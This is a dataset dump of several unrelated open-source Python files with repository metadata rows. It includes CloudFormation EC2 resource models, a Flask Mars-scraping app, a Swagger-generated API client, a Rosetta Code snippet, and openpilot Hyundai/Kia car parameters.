return 'AWS::EC2::Instance'
def fetch_state(self, stack_name, resources):
instance_id = self.physical_resource_id
if not instance_id:
return None
client = aws_stack.connect_to_service('ec2')
resp = client.describe_instances(InstanceIds=[instance_id])
return resp['Reservations'][0]['Instances'][0]
def update_resource(self, new_resource, stack_name, resources):
instance_id = new_resource['PhysicalResourceId']
props = new_resource['Properties']
groups = props.get('SecurityGroups', props.get('SecurityGroupIds'))
client = aws_stack.connect_to_service('ec2')
client.modify_instance_attribute(
Attribute='instanceType',
Groups=groups,
InstanceId=instance_id,
InstanceType={
'Value': props['InstanceType']
}
)
resp = client.describe_instances(
InstanceIds=[
instance_id
]
)
return resp['Reservations'][0]['Instances'][0]
class SecurityGroup(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::SecurityGroup'
def fetch_state(self, stack_name, resources):
props = self.props
group_id = props.get('GroupId')
group_name = props.get('GroupName')
client = aws_stack.connect_to_service('ec2')
if group_id:
resp = client.describe_security_groups(GroupIds=[group_id])
else:
resp = client.describe_security_groups(GroupNames=[group_name])
return (resp['SecurityGroups'] or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
if self.physical_resource_id:
return self.physical_resource_id
if attribute in REF_ID_ATTRS:
props = self.props
return props.get('GroupId') or props.get('GroupName')
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_security_group',
'parameters': {
'GroupName': 'GroupName',
'VpcId': 'VpcId',
'Description': 'GroupDescription'
}
},
'delete': {
'function': 'delete_security_group',
'parameters': {
'GroupId': 'PhysicalResourceId'
}
}
}
class EC2Subnet(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::Subnet'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
props = self.props
filters = [
{'Name': 'cidr-block', 'Values': [props['CidrBlock']]},
{'Name': 'vpc-id', 'Values': [props['VpcId']]}
]
subnets = client.describe_subnets(Filters=filters)['Subnets']
return (subnets or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('SubnetId')
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_subnet',
'parameters': {
'VpcId': 'VpcId',
'CidrBlock': 'CidrBlock',
'OutpostArn': 'OutpostArn',
'Ipv6CidrBlock': 'Ipv6CidrBlock',
'AvailabilityZone': 'AvailabilityZone'
# TODO: add TagSpecifications
}
},
'delete': {
'function': 'delete_subnet',
'parameters': {
'SubnetId': 'PhysicalResourceId'
}
}
}
class EC2VPC(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::VPC'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
resp = client.describe_vpcs(
Filters=[{'Name': 'cidr', 'Values': [self.props['CidrBlock']]}]
)
return (resp['Vpcs'] or [None])[0]
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_vpc',
'parameters': {
'CidrBlock': 'CidrBlock',
'InstanceTenancy': 'InstanceTenancy'
# TODO: add TagSpecifications
}
},
'delete': {
'function': 'delete_vpc',
'parameters': {
'VpcId': 'PhysicalResourceId'
}
}
}
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.physical_resource_id or self.props.get('VpcId')
class InstanceProfile(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::InstanceProfile'
def fetch_state(self, stack_name, resources):
instance_profile_name = self.get_physical_resource_id()
if not instance_profile_name:
return None
client = aws_stack.connect_to_service('iam')
resp = client.get_instance_profile(InstanceProfileName=instance_profile_name)
return resp['InstanceProfile']
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.physical_resource_id or self.props.get('InstanceProfileName')
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_instance_profile',
'parameters': {
'InstanceProfileName': 'InstanceProfileName',
'Path': 'Path'
}
},
'delete': {
'function': 'delete_instance_profile',
'parameters': {
'InstanceProfileName': 'InstanceProfileName'
}
}
}
class EC2RouteTable(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::RouteTable'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
route_tables = client.describe_route_tables(
Filters=[
{'Name': 'vpc-id', 'Values': [self.props['VpcId']]},
{'Name': 'association.main', 'Values': ['false']}
]
)['RouteTables']
return (route_tables or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.physical_resource_id or self.props.get('RouteTableId')
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_route_table',
'parameters': {
'VpcId': 'VpcId',
'TagSpecifications': lambda params, **kwargs: [
{
'ResourceType': 'route-table',
'Tags': params.get('Tags')
}
]
}
},
'delete': {
'function': 'delete_route_table',
'parameters': {
'RouteTableId': 'RouteTableId'
}
}
}
class EC2Route(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::Route'
def get_physical_resource_id(self, attribute=None, **kwargs):
props = self.props
return generate_route_id(
props.get('RouteTableId'),
props.get('DestinationCidrBlock'),
props.get('DestinationIpv6CidrBlock')
)
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_route',
'parameters': {
'DestinationCidrBlock': 'DestinationCidrBlock',
'DestinationIpv6CidrBlock': 'DestinationIpv6CidrBlock',
'RouteTableId': 'RouteTableId'
}
},
'delete': {
'function': 'delete_route',
'parameters': {
'DestinationCidrBlock': 'DestinationCidrBlock',
'DestinationIpv6CidrBlock': 'DestinationIpv6CidrBlock',
'RouteTableId': 'RouteTableId'
}
}
}
class EC2InternetGateway(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::InternetGateway'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
gateways = client.describe_internet_gateways()['InternetGateways']
tags = self.props.get('Tags')
gateway = [g for g in gateways if g.get('Tags') == tags]
return (gateway or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('InternetGatewayId')
@staticmethod
def get_deploy_templates():
def _create_params(params, **kwargs):
return {'TagSpecifications': [{'ResourceType': 'internet-gateway', 'Tags': params.get('Tags', [])}]}
return {
'create': {
'function': 'create_internet_gateway',
'parameters': _create_params
}
}
class EC2SubnetRouteTableAssociation(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::SubnetRouteTableAssociation'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
table_id = self.resolve_refs_recursively(stack_name, self.props.get('RouteTableId'), resources)
gw_id = self.resolve_refs_recursively(stack_name, self.props.get('GatewayId'), resources)
route_tables = client.describe_route_tables()['RouteTables']
route_table = ([t for t in route_tables if t['RouteTableId'] == table_id] or [None])[0]
if route_table:
associations = route_table.get('Associations', [])
association = [a for a in associations if a.get('GatewayId') == gw_id]
return (association or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('RouteTableAssociationId')
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'associate_route_table',
'parameters': {
'GatewayId': 'GatewayId',
'RouteTableId': 'RouteTableId',
'SubnetId': 'SubnetId'
}
}
}
class EC2VPCGatewayAttachment(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::EC2::VPCGatewayAttachment'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('ec2')
igw_id = self.resolve_refs_recursively(stack_name, self.props.get('InternetGatewayId'), resources)
vpngw_id = self.resolve_refs_recursively(stack_name, self.props.get('VpnGatewayId'), resources)
gateways = []
if igw_id:
gateways = client.describe_internet_gateways()['InternetGateways']
gateways = [g for g in gateways if g['InternetGatewayId'] == igw_id]
elif vpngw_id:
gateways = client.describe_vpn_gateways()['VpnGateways']
gateways = [g for g in gateways if g['VpnGatewayId'] == vpngw_id]
return (gateways or [None])[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('RouteTableAssociationId')
@staticmethod
def get_deploy_templates():
def _attach_gateway(resource_id, resources, *args, **kwargs):
client = aws_stack.connect_to_service('ec2')
resource = resources[resource_id]
resource_props = resource.get('Properties')
igw_id = resource_props.get('InternetGatewayId')
vpngw_id = resource_props.get('VpnGatewayId')
vpc_id = resource_props.get('VpcId')
if igw_id:
client.attach_internet_gateway(VpcId=vpc_id, InternetGatewayId=igw_id)
elif vpngw_id:
client.attach_vpn_gateway(VpcId=vpc_id, VpnGatewayId=vpngw_id)
return {
'create': {
'function': _attach_gateway
}
}
| 39.421848 | 119 | 0.622831 |
022641df7a7bd853a0638f6d3893a3c50f1d5f2a | 685 | py | Python | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/phone_app"
mongo = PyMongo(app)
# Or set inline
# mongo = PyMongo(app, uri="mongodb://localhost:27017/phone_app")
@app.route("/")
def index():
mars = mongo.db.mars.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scraper():
mars_db = mongo.db.mars
mars = scrape_mars.scrape_info()
mars_db.update({}, mars, upsert=True)
return redirect("/")
if __name__ == "__main__":
app.run(debug=True) | 22.833333 | 65 | 0.708029 |
a89a376ea882f13ba7cc1ab769f9e4a6e4dc8760 | 25,066 | py | Python | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | 1 | 2020-10-05T15:10:03.000Z | 2020-10-05T15:10:03.000Z | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | null | null | null | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
IBM Cohort Engine
Service to evaluate cohorts and measures # noqa: E501
OpenAPI spec version: 2.1.0 2022-02-18T21:50:45Z
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from swagger_client.configuration import Configuration
import swagger_client.models
from swagger_client import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
self.client_side_validation = configuration.client_side_validation
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(swagger_client.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance
| 39.165625 | 96 | 0.55314 |
dad80a46ce791f2a5b2f7adb530c30dd9d35aa0d | 159 | py | Python | Task/Arrays/Python/arrays-7.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Arrays/Python/arrays-7.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Arrays/Python/arrays-7.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2021-04-13T04:19:31.000Z | 2021-04-13T04:19:31.000Z | try:
# This will cause an exception, which will then be caught.
print array[len(array)]
except IndexError as e:
# Print the exception.
print e
| 22.714286 | 62 | 0.679245 |
1dd0467f48317bf34b2103e7bd3c8b97a95aaa9f | 35,989 | py | Python | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | 2 | 2021-04-09T00:12:01.000Z | 2021-05-03T07:55:43.000Z | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | null | null | null | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | 1 | 2021-04-13T08:33:40.000Z | 2021-04-13T08:33:40.000Z | # flake8: noqa
from cereal import car
from selfdrive.car import dbc_dict
Ecu = car.CarParams.Ecu
# Steer torque limits
class CarControllerParams:
def __init__(self, CP):
if CP.carFingerprint in [CAR.SONATA, CAR.PALISADE, CAR.SANTA_FE, CAR.VELOSTER, CAR.GENESIS_G70, CAR.IONIQ_EV_2020]:
self.STEER_MAX = 384
else:
self.STEER_MAX = 255
self.STEER_DELTA_UP = 3
self.STEER_DELTA_DOWN = 7
self.STEER_DRIVER_ALLOWANCE = 50
self.STEER_DRIVER_MULTIPLIER = 2
self.STEER_DRIVER_FACTOR = 1
class CAR:
# Hyundai
ELANTRA = "HYUNDAI ELANTRA LIMITED ULTIMATE 2017"
ELANTRA_GT_I30 = "HYUNDAI I30 N LINE 2019 & GT 2018 DCT"
HYUNDAI_GENESIS = "HYUNDAI GENESIS 2015-2016"
IONIQ = "HYUNDAI IONIQ HYBRID 2017-2019"
IONIQ_EV_LTD = "HYUNDAI IONIQ ELECTRIC LIMITED 2019"
IONIQ_EV_2020 = "HYUNDAI IONIQ ELECTRIC 2020"
KONA = "HYUNDAI KONA 2020"
KONA_EV = "HYUNDAI KONA ELECTRIC 2019"
SANTA_FE = "HYUNDAI SANTA FE LIMITED 2019"
SONATA = "HYUNDAI SONATA 2020"
SONATA_LF = "HYUNDAI SONATA 2019"
PALISADE = "HYUNDAI PALISADE 2020"
VELOSTER = "HYUNDAI VELOSTER 2019"
# Kia
KIA_FORTE = "KIA FORTE E 2018 & GT 2021"
KIA_NIRO_EV = "KIA NIRO EV 2020"
KIA_OPTIMA = "KIA OPTIMA SX 2019 & 2016"
KIA_OPTIMA_H = "KIA OPTIMA HYBRID 2017 & SPORTS 2019"
KIA_SORENTO = "KIA SORENTO GT LINE 2018"
KIA_STINGER = "KIA STINGER GT2 2018"
# Genesis
GENESIS_G70 = "GENESIS G70 2018"
GENESIS_G80 = "GENESIS G80 2017"
GENESIS_G90 = "GENESIS G90 2017"
class Buttons:
NONE = 0
RES_ACCEL = 1
SET_DECEL = 2
CANCEL = 4
FINGERPRINTS = {
CAR.ELANTRA: [{
66: 8, 67: 8, 68: 8, 127: 8, 273: 8, 274: 8, 275: 8, 339: 8, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 897: 8, 832: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1314: 8, 1322: 8, 1345: 8, 1349: 8, 1351: 8, 1353: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 2001: 8, 2003: 8, 2004: 8, 2009: 8, 2012: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}],
CAR.ELANTRA_GT_I30: [{
66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1193: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1952: 8, 1960: 8, 1988: 8, 2000: 8, 2001: 8, 2005: 8, 2008: 8, 2009: 8, 2013: 8, 2017: 8, 2025: 8
},
{
